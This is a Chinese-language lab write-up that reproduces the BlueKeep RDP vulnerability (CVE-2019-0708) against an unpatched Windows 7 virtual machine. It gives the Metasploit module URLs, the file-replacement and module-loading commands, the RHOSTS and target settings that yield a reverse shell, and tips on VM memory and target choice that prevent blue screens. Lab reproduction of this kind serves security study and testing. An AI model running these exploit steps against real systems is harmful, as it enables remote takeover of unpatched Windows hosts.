CVE-2019-0708漏洞复现及采坑记

天大地大妈咪最大 提交于 2019-12-03 20:50:46

经历了很多次失败、蓝屏之后,终于找到了稳定复现的方法。

虚拟化软件:VMware Workstation

操作系统:Windows 7 旗舰版 6.1.7601 Service Pack 1 Build 7601,官方镜像初始化安装后未安装任何安全补丁。

虚拟机配置:内存2GB、处理器1个、每个处理器的内核数量1个

 

实验步骤

第一步:从GitHub下载4个*.rb脚本

https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

第二步:创建rdp目录

# 不同的操作系统MSF的存放目录不同,这是Kali的目录
mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp

第三步:备份*.rb脚本

mv /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb  ./rdp.rb.old
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb  ./rdp_scanner.rb.old
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb  ./cve_2019_0708_bluekeep.rb.old

第四步:替换新*.rb脚本

将刚才下载的4个*.rb脚本分别放置到以下目录

mv ./cve_2019_0708_bluekeep_rce.rb  /usr/share/metasploit-framework/modules/exploits/windows/rdp/
mv ./rdp.rb  /usr/share/metasploit-framework/lib/msf/core/exploit/
mv ./rdp_scanner.rb  /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mv ./cve_2019_0708_bluekeep.rb  /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

第五步:启动MSF并使用Exp

# 重新加载所有模块
reload_all

# 使用攻击Exp
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

第六步:设置Exp选项

只需设置RHOSTStarget两个选项即可。

# 目标服务器IPset RHOSTS 192.168.6.15
# 我的实验环境为Windows7 + VMware,所以选择第三个set target 3

第七步:运行Exp

执行run指令即开始对目标服务器开展攻击,等待十几秒后成功反弹shell,如上图所示。

run

 

采坑记

不知道什么原因,当虚拟机配置为2GB内存时才能成功反弹shell,4GB内存和8GB内存均会出现蓝屏。

当内存配置为2GB时,还要根据你的实验环境选择正确的target。真实物理机选择target=1,VMware虚拟机选择target=3。

 

参考链接

《cve_2019_0708_bluekeep复现采坑 - Micr067 - 博客园》,https://www.cnblogs.com/micr067/p/11492022.html

《msf之CVE-2019-0708-Bluekeep漏洞利用模块 - kali's blog》,https://blog.bbskali.cn/index.php/archives/1378/

 

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!